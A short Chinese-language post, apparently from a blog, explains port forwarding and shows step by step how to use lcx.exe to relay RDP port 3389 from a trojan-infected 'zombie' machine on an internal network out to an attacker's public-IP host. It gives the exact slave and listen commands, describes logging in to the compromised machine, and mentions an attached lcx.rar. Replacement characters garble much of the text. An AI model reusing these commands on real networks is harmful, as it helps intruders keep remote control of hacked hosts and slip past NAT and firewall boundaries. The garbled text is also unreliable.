端口轉發(fā)(Port forwarding),有時被叫做隧道�����,是安全殼(SSH) 為網(wǎng)絡安全通信使用的一種方法��。端口轉發(fā)是轉發(fā)一個網(wǎng)絡端口從一個網(wǎng)絡節(jié)點到另一個網(wǎng)絡節(jié)點的行為����,其使一個外部用戶從外部經(jīng)過一個被激活的NAT路由器到達一個在私有內部IP地址(局域網(wǎng)內部)上的一個端口��。
這里我就用工具是Lcx�����,Lcx.exe是一個端口轉發(fā)工具��,相當于把肉雞A上的3389端口轉發(fā)到具有外網(wǎng)IP地址的B機上��,這樣連接B機的3389端口就相當于鏈接A機的3389端口。Lcx程序多用于被控制計算機(肉雞)處于內網(wǎng)的情況����,被控制機可能中了木馬程序����,雖然能夠進行控制�,但還是沒有使用遠程終端登陸到本機進行管理方便���,因此在很多情況下,都會想方設法在被控制計算機上開啟3389端口����,然后通過lcx等程序進行端口轉發(fā),進而在本地連接到被控制計算機的遠程終端并進行管理和使用�����。
先開啟 Windows xp 查看內網(wǎng)IP信息
在目標機器上執(zhí)行l(wèi)cx.exe -slave 公網(wǎng)ip 端口 內網(wǎng)ip 端口
例如:lcx.exe –slave 154.223.*.* 51 192.168.*.* 3389 將內網(wǎng)的3389端口轉發(fā)到公網(wǎng)的51端口
然后在公網(wǎng)的機器上:Lcx.exe –listen 監(jiān)聽51端口����,轉發(fā)到公網(wǎng)機器的3389端口
例如:Lcx.exe –listen 51 3389
這個時候已經(jīng)將內網(wǎng)的3389轉發(fā)到了公網(wǎng)機器的3389端口�����,我們在本地機器上遠程公網(wǎng)IP 3389 ��,就連接上了內網(wǎng)機器的3389��,此時已經(jīng)成功登陸進來�,我們查看IP,可以看到是目標機器���。
附件:lcx.rar
該文章在 2021/6/9 14:58:31 編輯過
400 186 1886
